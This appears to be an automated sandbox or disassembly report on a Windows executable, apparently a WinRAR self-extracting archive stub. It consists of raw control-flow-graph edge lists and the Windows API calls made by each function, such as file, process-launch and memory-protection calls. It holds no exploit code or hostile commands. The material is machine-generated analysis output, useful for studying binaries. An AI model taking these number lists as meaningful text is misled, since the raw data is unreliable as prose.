9f91b1 23790->23792 23791->23788 23791->23789 23791->23798 24026 9f9ebf SetEndOfFile 23791->24026 23792->23798 24027 9f1f94 74 API calls 23792->24027 23795 9f914b 23797 9f96d0 75 API calls 23795->23797 23797->23788 23798->23747 23800 9f1643 23799->23800 24042 9fc8ca 23800->24042 23803->23659 23804->23655 23806 9fb087 __EH_prolog 23805->23806 23811 9fea80 80 API calls 23806->23811 23808 9fb099 23812 9fb195 23808->23812 23811->23808 23813 9fb1a7 ___scrt_get_show_window_mode 23812->23813 23816 a00948 23813->23816 23819 a00908 GetCurrentProcess GetProcessAffinityMask 23816->23819 23820 9fb10f 23819->23820 23820->23678 23821->23681 23827 9f16d2 23822->23827 23824 9f70b9 23824->23694 23825->23696 23826->23697 23828 9f16e8 23827->23828 23839 9f1740 __vsnwprintf_l 23827->23839 23829 9f1711 23828->23829 23840 9f6e91 74 API calls 
__vswprintf_c_l 23828->23840 23830 9f1767 23829->23830 23836 9f172d ___std_exception_copy 23829->23836 23833 a135de 22 API calls 23830->23833 23832 9f1707 23841 9f6efd 75 API calls 23832->23841 23835 9f176e 23833->23835 23835->23839 23843 9f6efd 75 API calls 23835->23843 23836->23839 23842 9f6efd 75 API calls 23836->23842 23839->23824 23840->23832 23841->23829 23842->23839 23843->23839 23845 a00c56 __vsnwprintf_l 23844->23845 23845->23701 23847 9f1961 23846->23847 23849 9f195d 23846->23849 23850 9f1896 23847->23850 23849->23704 23851 9f18a8 23850->23851 23852 9f18e5 23850->23852 23853 9f3aac 97 API calls 23851->23853 23858 9f3f18 23852->23858 23854 9f18c8 23853->23854 23854->23849 23862 9f3f21 23858->23862 23859 9f3aac 97 API calls 23859->23862 23860 9f1906 23860->23854 23863 9f1e00 23860->23863 23862->23859 23862->23860 23875 a0067c 23862->23875 23864 9f1e0a __EH_prolog 23863->23864 23883 9f3b3d 23864->23883 23866 9f1e34 23867 9f16d2 76 API calls 23866->23867 23869 9f1ebb 23866->23869 23868 9f1e4b 23867->23868 23911 9f1849 76 API calls 23868->23911 23869->23854 23871 9f1e63 23873 9f1e6f 23871->23873 23912 a0137a MultiByteToWideChar 23871->23912 23913 9f1849 76 API calls 23873->23913 23876 a00683 23875->23876 23877 a0069e 23876->23877 23881 9f6e8c RaiseException Concurrency::cancel_current_task 23876->23881 23879 a006af SetThreadExecutionState 23877->23879 23882 9f6e8c RaiseException Concurrency::cancel_current_task 23877->23882 23879->23862 23881->23877 23882->23879 23884 9f3b47 __EH_prolog 23883->23884 23885 9f3b5d 23884->23885 23886 9f3b79 23884->23886 23942 9f6dc1 74 API calls 23885->23942 23888 9f3dc2 23886->23888 23891 9f3ba5 23886->23891 23959 9f6dc1 74 API calls 23888->23959 23890 9f3b68 23890->23866 23891->23890 23914 a02c42 23891->23914 23893 9f3c26 23894 9f3cb1 23893->23894 23910 9f3c1d 23893->23910 23945 9fc991 23893->23945 23927 9faa88 23894->23927 23895 9f3c22 23895->23893 23944 9f2034 76 API calls 23895->23944 23897 9f3bf4 23897->23893 23897->23895 
23898 9f3c12 23897->23898 23943 9f6dc1 74 API calls 23898->23943 23900 9f3cc4 23904 9f3d3e 23900->23904 23905 9f3d48 23900->23905 23931 9f92e6 23904->23931 23951 a028f1 121 API calls 23905->23951 23908 9f3d46 23908->23910 23952 9f1f94 74 API calls 23908->23952 23953 a01acf 23910->23953 23911->23871 23912->23873 23913->23869 23915 a02c51 23914->23915 23917 a02c5b 23914->23917 23960 9f6efd 75 API calls 23915->23960 23918 a02c9d Concurrency::cancel_current_task 23917->23918 23920 a02ca2 ___std_exception_copy 23917->23920 23926 a02cfd ___scrt_get_show_window_mode 23917->23926 23962 a1157a RaiseException 23918->23962 23919 a02da9 Concurrency::cancel_current_task 23963 a1157a RaiseException 23919->23963 23920->23919 23921 a02cd9 23920->23921 23920->23926 23961 a02b7b 75 API calls 3 library calls 23921->23961 23925 a02dc1 23926->23897 23926->23926 23928 9faa95 23927->23928 23930 9faa9f 23927->23930 23929 a0e24a new 8 API calls 23928->23929 23929->23930 23930->23900 23932 9f92f0 __EH_prolog 23931->23932 23964 9f7dc6 23932->23964 23935 9f709d 76 API calls 23936 9f9302 23935->23936 23967 9fca6c 23936->23967 23938 9f935c 23938->23908 23940 9fca6c 114 API calls 23941 9f9314 23940->23941 23941->23938 23941->23940 23976 9fcc51 97 API calls __vsnwprintf_l 23941->23976 23942->23890 23943->23910 23944->23893 23946 9fc9c4 23945->23946 23947 9fc9b2 23945->23947 23978 9f6249 80 API calls 23946->23978 23977 9f6249 80 API calls 23947->23977 23950 9fc9bc 23950->23894 23951->23908 23952->23910 23954 a01ad9 23953->23954 23955 a01af2 23954->23955 23958 a01b06 23954->23958 23979 a0075b 84 API calls 23955->23979 23957 a01af9 23957->23958 23959->23890 23960->23917 23961->23926 23962->23919 23963->23925 23965 9facf5 GetVersionExW 23964->23965 23966 9f7dcb 23965->23966 23966->23935 23973 9fca82 __vsnwprintf_l 23967->23973 23968 9fcbf7 23969 9fcc1f 23968->23969 23970 9fca0b 6 API calls 23968->23970 23971 a0067c SetThreadExecutionState RaiseException 23969->23971 23970->23969 23974 9fcbee 
23971->23974 23972 a084bd 99 API calls 23972->23973 23973->23968 23973->23972 23973->23974 23975 9fab70 89 API calls 23973->23975 23974->23941 23975->23973 23976->23941 23977->23950 23978->23950 23979->23957 23980->23714 23981->23714 23982->23711 23984 9f5e4a 23983->23984 24028 9f5d67 23984->24028 23987 9f5e7d 23988 9f5eb5 23987->23988 24033 9fad65 CharUpperW CompareStringW 23987->24033 23988->23727 23990 9f8289 23989->23990 24039 a0179d CharUpperW 23990->24039 23992 9f8333 23992->23730 23994 9f7d7b 23993->23994 23995 9f7dbb 23994->23995 24040 9f7043 74 API calls 23994->24040 23995->23738 23997 9f7db3 24041 9f6dc1 74 API calls 23997->24041 24000 9f9d73 23999->24000 24002 9f9d82 23999->24002 24001 9f9d79 FlushFileBuffers 24000->24001 24000->24002 24001->24002 24003 9f9dfb SetFileTime 24002->24003 24003->23795 24004->23718 24005->23720 24006->23726 24007->23738 24008->23738 24009->23735 24010->23750 24011->23742 24012->23750 24014 9f998f 24013->24014 24015 9f9992 GetFileType 24013->24015 24014->23757 24016 9f99a0 24015->24016 24016->23757 24017->23760 24018->23762 24019->23763 24020->23786 24021->23786 24022->23786 24023->23786 24024->23786 24025->23791 24026->23789 24027->23798 24034 9f5c64 24028->24034 24030 9f5d88 24030->23987 24032 9f5c64 2 API calls 24032->24030 24033->23987 24035 9f5c6e 24034->24035 24037 9f5d56 24035->24037 24038 9fad65 CharUpperW CompareStringW 24035->24038 24037->24030 24037->24032 24038->24035 24039->23992 24040->23997 24041->23995 24043 9fc8db 24042->24043 24048 9fa90e 84 API calls 24043->24048 24045 9fc90d 24049 9fa90e 84 API calls 24045->24049 24047 9fc918 24048->24045 24049->24047 24051 9fa5fe 24050->24051 24052 9fa691 FindNextFileW 24051->24052 24053 9fa621 FindFirstFileW 24051->24053 24054 9fa69c GetLastError 24052->24054 24055 9fa6b0 24052->24055 24056 9fa638 24053->24056 24061 9fa675 24053->24061 24054->24055 24055->24061 24057 9fb66c 2 API calls 24056->24057 24058 9fa64d 24057->24058 24059 9fa66a GetLastError 24058->24059 24060 
9fa651 FindFirstFileW 24058->24060 24059->24061 24060->24059 24060->24061 24061->23668 24071 a09d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24062->24071 24064 a09d21 24065 a09d2d 24064->24065 24072 a09d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24064->24072 24065->23445 24065->23446 24067->23449 24068->23455 24069->23455 24070->23458 24071->24064 24072->24065 24073->23466 24075 9f9ef7 76 API calls 24074->24075 24076 9f1f5b 24075->24076 24077 9f19a6 97 API calls 24076->24077 24079 9f1f78 24076->24079 24078 9f1f68 24077->24078 24078->24079 24081 9f6dc1 74 API calls 24078->24081 24079->23474 24079->23475 24081->24079 24083 a0acc8 GetDlgItem 24082->24083 24084 a0ac8f GetMessageW 24082->24084 24083->23485 24083->23486 24085 a0acb4 TranslateMessage DispatchMessageW 24084->24085 24086 a0aca5 IsDialogMessageW 24084->24086 24085->24083 24086->24083 24086->24085 24745 a0b8e0 93 API calls _swprintf 24746 a08ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24749 a216e0 CloseHandle 24096 9f10d5 24101 9f5bd7 24096->24101 24102 9f5be1 __EH_prolog 24101->24102 24103 9fb07d 82 API calls 24102->24103 24104 9f5bed 24103->24104 24108 9f5dcc GetCurrentProcess GetProcessAffinityMask 24104->24108 24796 a0ebf7 20 API calls 24121 a0e1f9 24122 a0e203 24121->24122 24123 a0df59 ___delayLoadHelper2@8 19 API calls 24122->24123 24124 a0e210 24123->24124 24751 a114f8 RaiseException 24797 a1abfd 6 API calls DloadUnlock 24753 a0eac0 27 API calls pre_c_initialization 24798 a1ebc1 21 API calls __vsnwprintf_l 24799 a097c0 10 API calls 24755 a19ec0 21 API calls 24800 a1b5c0 GetCommandLineA GetCommandLineW 24756 a0a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24758 a0acd0 100 API calls 24804 a019d0 26 API calls std::bad_exception::bad_exception 24139 a0ead2 24140 a0eade ___scrt_is_nonwritable_in_current_image 24139->24140 24165 a0e5c7 24140->24165 24142 a0eae5 24144 a0eb0e 24142->24144 24245 a0ef05 IsProcessorFeaturePresent IsDebuggerPresent 
SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 24142->24245 24153 a0eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24144->24153 24176 a1824d 24144->24176 24148 a0eb2d ___scrt_is_nonwritable_in_current_image 24149 a0ebad 24184 a0f020 24149->24184 24153->24149 24246 a17243 38 API calls 3 library calls 24153->24246 24160 a0ebd9 24162 a0ebe2 24160->24162 24247 a1764a 28 API calls _abort 24160->24247 24248 a0e73e 13 API calls 2 library calls 24162->24248 24166 a0e5d0 24165->24166 24249 a0ed5b IsProcessorFeaturePresent 24166->24249 24168 a0e5dc 24250 a12016 24168->24250 24170 a0e5e1 24175 a0e5e5 24170->24175 24259 a180d7 24170->24259 24173 a0e5fc 24173->24142 24175->24142 24179 a18264 24176->24179 24177 a0ec4a DloadUnlock 5 API calls 24178 a0eb27 24177->24178 24178->24148 24180 a181f1 24178->24180 24179->24177 24181 a18220 24180->24181 24182 a0ec4a DloadUnlock 5 API calls 24181->24182 24183 a18249 24182->24183 24183->24153 24309 a0f350 24184->24309 24186 a0f033 GetStartupInfoW 24187 a0ebb3 24186->24187 24188 a1819e 24187->24188 24311 a1b290 24188->24311 24190 a0ebbc 24193 a0d5d4 24190->24193 24192 a181a7 24192->24190 24315 a1b59a 38 API calls 24192->24315 24436 a000cf 24193->24436 24197 a0d5f3 24485 a0a335 24197->24485 24199 a0d5fc 24489 a013b3 GetCPInfo 24199->24489 24201 a0d606 ___scrt_get_show_window_mode 24202 a0d619 GetCommandLineW 24201->24202 24203 a0d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24202->24203 24204 a0d628 24202->24204 24205 9f400a _swprintf 51 API calls 24203->24205 24492 a0bc84 24204->24492 24207 a0d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24205->24207 24503 a0aded LoadBitmapW 24207->24503 24210 a0d6a0 24497 a0d287 24210->24497 24211 a0d636 OpenFileMappingW 24214 a0d696 CloseHandle 24211->24214 24215 a0d64f MapViewOfFile 24211->24215 24214->24203 24217 a0d68d UnmapViewOfFile 24215->24217 24219 a0d660 __vsnwprintf_l 24215->24219 24217->24214 24222 a0d287 2 
API calls 24219->24222 24224 a0d67c 24222->24224 24223 a08835 8 API calls 24225 a0d76a DialogBoxParamW 24223->24225 24224->24217 24226 a0d7a4 24225->24226 24227 a0d7b6 Sleep 24226->24227 24228 a0d7bd 24226->24228 24227->24228 24231 a0d7cb 24228->24231 24533 a0a544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 24228->24533 24230 a0d7ea DeleteObject 24232 a0d806 24230->24232 24233 a0d7ff DeleteObject 24230->24233 24231->24230 24234 a0d837 24232->24234 24235 a0d849 24232->24235 24233->24232 24534 a0d2e6 6 API calls 24234->24534 24530 a0a39d 24235->24530 24237 a0d83d CloseHandle 24237->24235 24239 a0d883 24240 a1757e GetModuleHandleW 24239->24240 24241 a0ebcf 24240->24241 24241->24160 24242 a176a7 24241->24242 24668 a17424 24242->24668 24245->24142 24246->24149 24247->24162 24248->24148 24249->24168 24251 a1201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24250->24251 24263 a1310e 24251->24263 24255 a12031 24256 a1203c 24255->24256 24277 a1314a DeleteCriticalSection 24255->24277 24256->24170 24258 a12029 24258->24170 24305 a1b73a 24259->24305 24262 a1203f 8 API calls 3 library calls 24262->24175 24264 a13117 24263->24264 24266 a13140 24264->24266 24268 a12025 24264->24268 24278 a13385 24264->24278 24283 a1314a DeleteCriticalSection 24266->24283 24268->24258 24269 a1215c 24268->24269 24298 a1329a 24269->24298 24271 a12166 24272 a12171 24271->24272 24303 a13348 6 API calls try_get_function 24271->24303 24272->24255 24274 a1217f 24275 a1218c 24274->24275 24304 a1218f 6 API calls ___vcrt_FlsFree 24274->24304 24275->24255 24277->24258 24284 a13179 24278->24284 24281 a133bc InitializeCriticalSectionAndSpinCount 24282 a133a8 24281->24282 24282->24264 24283->24268 24285 a131ad 24284->24285 24286 a131a9 24284->24286 24285->24281 24285->24282 24286->24285 24289 a131cd 24286->24289 24291 a13219 24286->24291 24288 a131d9 GetProcAddress 24290 a131e9 __crt_fast_encode_pointer 24288->24290 24289->24285 24289->24288 24290->24285 
24292 a13241 LoadLibraryExW 24291->24292 24293 a13236 24291->24293 24294 a13275 24292->24294 24295 a1325d GetLastError 24292->24295 24293->24286 24294->24293 24297 a1328c FreeLibrary 24294->24297 24295->24294 24296 a13268 LoadLibraryExW 24295->24296 24296->24294 24297->24293 24299 a13179 try_get_function 5 API calls 24298->24299 24300 a132b4 24299->24300 24301 a132cc TlsAlloc 24300->24301 24302 a132bd 24300->24302 24302->24271 24303->24274 24304->24272 24308 a1b753 24305->24308 24306 a0ec4a DloadUnlock 5 API calls 24307 a0e5ee 24306->24307 24307->24173 24307->24262 24308->24306 24310 a0f367 24309->24310 24310->24186 24310->24310 24312 a1b299 24311->24312 24313 a1b2a2 24311->24313 24316 a1b188 24312->24316 24313->24192 24315->24192 24317 a18fa5 IsInExceptionSpec 38 API calls 24316->24317 24318 a1b195 24317->24318 24336 a1b2ae 24318->24336 24320 a1b19d 24345 a1af1b 24320->24345 24323 a1b1b4 24323->24313 24324 a18518 __vsnwprintf_l 21 API calls 24325 a1b1c5 24324->24325 24332 a1b1f7 24325->24332 24352 a1b350 24325->24352 24328 a184de _free 20 API calls 24328->24323 24329 a1b1f2 24362 a1895a 20 API calls __dosmaperr 24329->24362 24331 a1b23b 24331->24332 24363 a1adf1 26 API calls 24331->24363 24332->24328 24333 a1b20f 24333->24331 24334 a184de _free 20 API calls 24333->24334 24334->24331 24337 a1b2ba ___scrt_is_nonwritable_in_current_image 24336->24337 24338 a18fa5 IsInExceptionSpec 38 API calls 24337->24338 24339 a1b2c4 24338->24339 24342 a1b348 ___scrt_is_nonwritable_in_current_image 24339->24342 24344 a184de _free 20 API calls 24339->24344 24364 a18566 38 API calls _abort 24339->24364 24365 a1a3f1 EnterCriticalSection 24339->24365 24366 a1b33f LeaveCriticalSection _abort 24339->24366 24342->24320 24344->24339 24346 a13dd6 __cftof 38 API calls 24345->24346 24347 a1af2d 24346->24347 24348 a1af3c GetOEMCP 24347->24348 24349 a1af4e 24347->24349 24351 a1af65 24348->24351 24350 a1af53 GetACP 24349->24350 24349->24351 24350->24351 24351->24323 24351->24324 24353 a1af1b 40 
API calls 24352->24353 24354 a1b36f 24353->24354 24357 a1b3c0 IsValidCodePage 24354->24357 24359 a1b376 24354->24359 24361 a1b3e5 ___scrt_get_show_window_mode 24354->24361 24355 a0ec4a DloadUnlock 5 API calls 24356 a1b1ea 24355->24356 24356->24329 24356->24333 24358 a1b3d2 GetCPInfo 24357->24358 24357->24359 24358->24359 24358->24361 24359->24355 24367 a1aff4 GetCPInfo 24361->24367 24362->24332 24363->24332 24365->24339 24366->24339 24372 a1b02e 24367->24372 24376 a1b0d8 24367->24376 24370 a0ec4a DloadUnlock 5 API calls 24371 a1b184 24370->24371 24371->24359 24377 a1c099 24372->24377 24375 a1a275 __vsnwprintf_l 43 API calls 24375->24376 24376->24370 24378 a13dd6 __cftof 38 API calls 24377->24378 24379 a1c0b9 MultiByteToWideChar 24378->24379 24381 a1c18f 24379->24381 24382 a1c0f7 24379->24382 24383 a0ec4a DloadUnlock 5 API calls 24381->24383 24385 a18518 __vsnwprintf_l 21 API calls 24382->24385 24388 a1c118 __vsnwprintf_l ___scrt_get_show_window_mode 24382->24388 24386 a1b08f 24383->24386 24384 a1c189 24396 a1a2c0 20 API calls _free 24384->24396 24385->24388 24391 a1a275 24386->24391 24388->24384 24389 a1c15d MultiByteToWideChar 24388->24389 24389->24384 24390 a1c179 GetStringTypeW 24389->24390 24390->24384 24392 a13dd6 __cftof 38 API calls 24391->24392 24393 a1a288 24392->24393 24397 a1a058 24393->24397 24396->24381 24399 a1a073 __vsnwprintf_l 24397->24399 24398 a1a099 MultiByteToWideChar 24400 a1a0c3 24398->24400 24411 a1a24d 24398->24411 24399->24398 24401 a1a0e4 __vsnwprintf_l 24400->24401 24406 a18518 __vsnwprintf_l 21 API calls 24400->24406 24404 a1a199 24401->24404 24405 a1a12d MultiByteToWideChar 24401->24405 24402 a0ec4a DloadUnlock 5 API calls 24403 a1a260 24402->24403 24403->24375 24433 a1a2c0 20 API calls _free 24404->24433 24405->24404 24407 a1a146 24405->24407 24406->24401 24424 a1a72c 24407->24424 24411->24402 24412 a1a170 24412->24404 24415 a1a72c __vsnwprintf_l 11 API calls 24412->24415 24413 a1a1a8 24414 a18518 __vsnwprintf_l 21 API calls 
24413->24414 24417 a1a1c9 __vsnwprintf_l 24413->24417 24414->24417 24415->24404 24416 a1a23e 24432 a1a2c0 20 API calls _free 24416->24432 24417->24416 24418 a1a72c __vsnwprintf_l 11 API calls 24417->24418 24420 a1a21d 24418->24420 24420->24416 24421 a1a22c WideCharToMultiByte 24420->24421 24421->24416 24422 a1a26c 24421->24422 24434 a1a2c0 20 API calls _free 24422->24434 24425 a1a458 __dosmaperr 5 API calls 24424->24425 24426 a1a753 24425->24426 24429 a1a75c 24426->24429 24435 a1a7b4 10 API calls 3 library calls 24426->24435 24428 a1a79c LCMapStringW 24428->24429 24430 a0ec4a DloadUnlock 5 API calls 24429->24430 24431 a1a15d 24430->24431 24431->24404 24431->24412 24431->24413 24432->24404 24433->24411 24434->24404 24435->24428 24437 a0e360 24436->24437 24438 a000d9 GetModuleHandleW 24437->24438 24439 a000f0 GetProcAddress 24438->24439 24440 a00154 24438->24440 24442 a00121 GetProcAddress 24439->24442 24443 a00109 24439->24443 24441 a00484 GetModuleFileNameW 24440->24441 24544 a170dd 42 API calls __vsnwprintf_l 24440->24544 24456 a004a3 24441->24456 24442->24440 24445 a00133 24442->24445 24443->24442 24445->24440 24446 a003be 24446->24441 24447 a003c9 GetModuleFileNameW CreateFileW 24446->24447 24448 a00478 CloseHandle 24447->24448 24449 a003fc SetFilePointer 24447->24449 24448->24441 24449->24448 24450 a0040c ReadFile 24449->24450 24450->24448 24453 a0042b 24450->24453 24453->24448 24455 a00085 2 API calls 24453->24455 24454 a004d2 CompareStringW 24454->24456 24455->24453 24456->24454 24457 a00520 24456->24457 24458 a00508 GetFileAttributesW 24456->24458 24535 9facf5 24456->24535 24538 a00085 24456->24538 24459 a0052a 24457->24459 24462 a00560 24457->24462 24458->24456 24458->24457 24461 a00542 GetFileAttributesW 24459->24461 24463 a0055a 24459->24463 24460 a0066f 24484 a09da4 GetCurrentDirectoryW 24460->24484 24461->24459 24461->24463 24462->24460 24464 9facf5 GetVersionExW 24462->24464 24463->24462 24465 a0057a 24464->24465 24466 a00581 24465->24466 24467 a005e7 
24465->24467 24468 a00085 2 API calls 24466->24468 24469 9f400a _swprintf 51 API calls 24467->24469 24471 a0058b 24468->24471 24470 a0060f AllocConsole 24469->24470 24472 a00667 ExitProcess 24470->24472 24473 a0061c GetCurrentProcessId AttachConsole 24470->24473 24474 a00085 2 API calls 24471->24474 24545 a135b3 24473->24545 24476 a00595 24474->24476 24478 9fddd1 53 API calls 24476->24478 24477 a0063d GetStdHandle WriteConsoleW Sleep FreeConsole 24477->24472 24479 a005b0 24478->24479 24480 9f400a _swprintf 51 API calls 24479->24480 24481 a005c3 24480->24481 24482 9fddd1 53 API calls 24481->24482 24483 a005d2 24482->24483 24483->24472 24484->24197 24486 a00085 2 API calls 24485->24486 24487 a0a349 OleInitialize 24486->24487 24488 a0a36c GdiplusStartup SHGetMalloc 24487->24488 24488->24199 24490 a013d7 IsDBCSLeadByte 24489->24490 24490->24490 24491 a013ef 24490->24491 24491->24201 24493 a0bc8e 24492->24493 24494 a0bda4 24493->24494 24496 a0179d CharUpperW 24493->24496 24547 9fecad 80 API calls ___scrt_get_show_window_mode 24493->24547 24494->24210 24494->24211 24496->24493 24498 a0e360 24497->24498 24499 a0d294 SetEnvironmentVariableW 24498->24499 24500 a0d2b7 24499->24500 24501 a0d2df 24500->24501 24502 a0d2d3 SetEnvironmentVariableW 24500->24502 24501->24203 24502->24501 24504 a0ae15 24503->24504 24505 a0ae0e 24503->24505 24507 a0ae2a 24504->24507 24508 a0ae1b GetObjectW 24504->24508 24548 a09e1c FindResourceW 24505->24548 24509 a09d1a 4 API calls 24507->24509 24508->24507 24510 a0ae3d 24509->24510 24511 a0ae80 24510->24511 24512 a0ae5c 24510->24512 24513 a09e1c 12 API calls 24510->24513 24522 9fd31c 24511->24522 24562 a09d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24512->24562 24515 a0ae4d 24513->24515 24515->24512 24517 a0ae53 DeleteObject 24515->24517 24516 a0ae64 24563 a09d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24516->24563 24517->24512 24519 a0ae6d 24564 a09f5d 8 API calls ___scrt_get_show_window_mode 24519->24564 24521 a0ae74 DeleteObject 
24521->24511 24573 9fd341 24522->24573 24524 9fd328 24613 9fda4e GetModuleHandleW FindResourceW 24524->24613 24527 a08835 24528 a0e24a new 8 API calls 24527->24528 24529 a08854 24528->24529 24529->24223 24531 a0a3cc GdiplusShutdown OleUninitialize 24530->24531 24531->24239 24533->24231 24534->24237 24536 9fad09 GetVersionExW 24535->24536 24537 9fad45 24535->24537 24536->24537 24537->24456 24539 a0e360 24538->24539 24540 a00092 GetSystemDirectoryW 24539->24540 24541 a000c8 24540->24541 24542 a000aa 24540->24542 24541->24456 24543 a000bb LoadLibraryW 24542->24543 24543->24541 24544->24446 24546 a135bb 24545->24546 24546->24477 24546->24546 24547->24493 24549 a09e3e SizeofResource 24548->24549 24550 a09e70 24548->24550 24549->24550 24551 a09e52 LoadResource 24549->24551 24550->24504 24551->24550 24552 a09e63 LockResource 24551->24552 24552->24550 24553 a09e77 GlobalAlloc 24552->24553 24553->24550 24554 a09e92 GlobalLock 24553->24554 24555 a09f21 GlobalFree 24554->24555 24556 a09ea1 __vsnwprintf_l 24554->24556 24555->24550 24557 a09f1a GlobalUnlock 24556->24557 24565 a09d7b GdipAlloc 24556->24565 24557->24555 24560 a09eef GdipCreateHBITMAPFromBitmap 24561 a09f05 24560->24561 24561->24557 24562->24516 24563->24519 24564->24521 24566 a09d9a 24565->24566 24567 a09d8d 24565->24567 24566->24557 24566->24560 24566->24561 24569 a09b0f 24567->24569 24570 a09b30 GdipCreateBitmapFromStreamICM 24569->24570 24571 a09b37 GdipCreateBitmapFromStream 24569->24571 24572 a09b3c 24570->24572 24571->24572 24572->24566 24574 9fd34b _wcschr __EH_prolog 24573->24574 24575 9fd37a GetModuleFileNameW 24574->24575 24576 9fd3ab 24574->24576 24577 9fd394 24575->24577 24615 9f99b0 24576->24615 24577->24576 24579 9f9653 79 API calls 24582 9fd7ab 24579->24582 24580 9fd407 24626 a15a90 26 API calls 3 library calls 24580->24626 24582->24524 24583 9fd41a 24627 a15a90 26 API calls 3 library calls 24583->24627 24584 9fd3db 24584->24580 24586 a03781 76 API calls 24584->24586 24597 9fd627 24584->24597 
24586->24584 24587 9fd563 24587->24597 24645 9f9d30 77 API calls 24587->24645 24591 9fd57d ___std_exception_copy 24592 9f9bf0 80 API calls 24591->24592 24591->24597 24595 9fd5a6 ___std_exception_copy 24592->24595 24594 9fd42c 24594->24587 24594->24597 24628 9f9e40 24594->24628 24636 9f9bf0 24594->24636 24644 9f9d30 77 API calls 24594->24644 24595->24597 24610 9fd5b2 ___std_exception_copy 24595->24610 24646 a0137a MultiByteToWideChar 24595->24646 24597->24579 24598 9fd72b 24647 9fce72 76 API calls 24598->24647 24600 9fda0a 24652 9fce72 76 API calls 24600->24652 24602 9fd9fa 24602->24524 24603 9fd771 24648 a15a90 26 API calls 3 library calls 24603->24648 24605 9fd742 24605->24603 24607 a03781 76 API calls 24605->24607 24606 9fd78b 24649 a15a90 26 API calls 3 library calls 24606->24649 24607->24605 24609 a01596 WideCharToMultiByte 24609->24610 24610->24597 24610->24598 24610->24600 24610->24602 24610->24609 24650 9fdd6b 50 API calls __vsnprintf 24610->24650 24651 a158d9 26 API calls 3 library calls 24610->24651 24614 9fd32f 24613->24614 24614->24527 24616 9f99ba 24615->24616 24617 9f9a39 CreateFileW 24616->24617 24618 9f9aaa 24617->24618 24619 9f9a59 GetLastError 24617->24619 24621 9f9ae1 24618->24621 24623 9f9ac7 SetFileTime 24618->24623 24620 9fb66c 2 API calls 24619->24620 24622 9f9a79 24620->24622 24621->24584 24622->24618 24624 9f9a7d CreateFileW GetLastError 24622->24624 24623->24621 24625 9f9aa1 24624->24625 24625->24618 24626->24583 24627->24594 24629 9f9e64 SetFilePointer 24628->24629 24630 9f9e53 24628->24630 24631 9f9e82 GetLastError 24629->24631 24634 9f9e9d 24629->24634 24630->24634 24653 9f6fa5 75 API calls 24630->24653 24633 9f9e8c 24631->24633 24631->24634 24633->24634 24654 9f6fa5 75 API calls 24633->24654 24634->24594 24637 9f9c03 24636->24637 24639 9f9bfc 24636->24639 24637->24639 24640 9f9c9e 24637->24640 24642 9f9cc0 24637->24642 24655 9f984e 24637->24655 24639->24594 24640->24639 24667 9f6f6b 75 API calls 24640->24667 24642->24639 24643 9f984e 5 
                  Control-flow Graph (edge list of the preceding graphs omitted; the text export of the graph is not readable). Functions and API calls recoverable from it:
                  • 9f984e-9f98c7: GetStdHandle, ReadFile, GetFileType, GetLastError (low-level read)
                  • 9f9f2f-9fa031: GetStdHandle, WriteFile (low-level write)
                  • 9f9b59-9f9bd7: SetFilePointer, GetLastError
                  • a17430-a17628 (_abort): EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, FreeLibrary, GetPEB, GetCurrentProcess, TerminateProcess, ExitProcess
                  • a0daaa-a0e1d8 (___delayLoadHelper2@8): LoadLibraryExA, GetProcAddress, GetLastError, RaiseException, FreeLibrary; DloadProtectSection: VirtualQuery, GetSystemInfo, VirtualProtect; DloadUnlock: GetModuleHandleW, GetProcAddress
                  • a0c40e-a0d08a (file moves, dialog text updates, ShellExecuteExW launch): CompareStringW, SetWindowTextW, GetDlgItem, SendMessageW, ExpandEnvironmentStringsW, GetCurrentDirectoryW, FindClose, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, MoveFileExW, GetFullPathNameW, CharUpperW, ShellExecuteExW, ShowWindow, GetExitCodeProcess, CloseHandle; heap: RtlAllocateHeap, RtlFreeHeap, HeapReAlloc, SetLastError
                  • a0d573-a0d5c3: SetDlgItemTextW
                  • Single-node entries: GetProcessHeap (a1b710), RtlUnwind (a13460), GetSystemTimeAsFileTime/GetCurrentThreadId/GetCurrentProcessId/QueryPerformanceCounter (a0ec40, ___security_init_cookie), GetClientRect (a08c40), IsProcessorFeaturePresent (a20040), DialogBoxParamW (a0d34e), GdipDisposeImage/GdipFree (a09b50)

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00A000CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00A000E4
                    • Part of subcall function 00A000CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A000F6
                    • Part of subcall function 00A000CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A00127
                    • Part of subcall function 00A09DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00A09DAC
                    • Part of subcall function 00A0A335: OleInitialize.OLE32(00000000), ref: 00A0A34E
                    • Part of subcall function 00A0A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A0A385
                    • Part of subcall function 00A0A335: SHGetMalloc.SHELL32(00A38430), ref: 00A0A38F
                    • Part of subcall function 00A013B3: GetCPInfo.KERNEL32(00000000,?), ref: 00A013C4
                    • Part of subcall function 00A013B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00A013D8
                  • GetCommandLineW.KERNEL32 ref: 00A0D61C
                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00A0D643
                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00A0D654
                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00A0D68E
                    • Part of subcall function 00A0D287: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00A0D29D
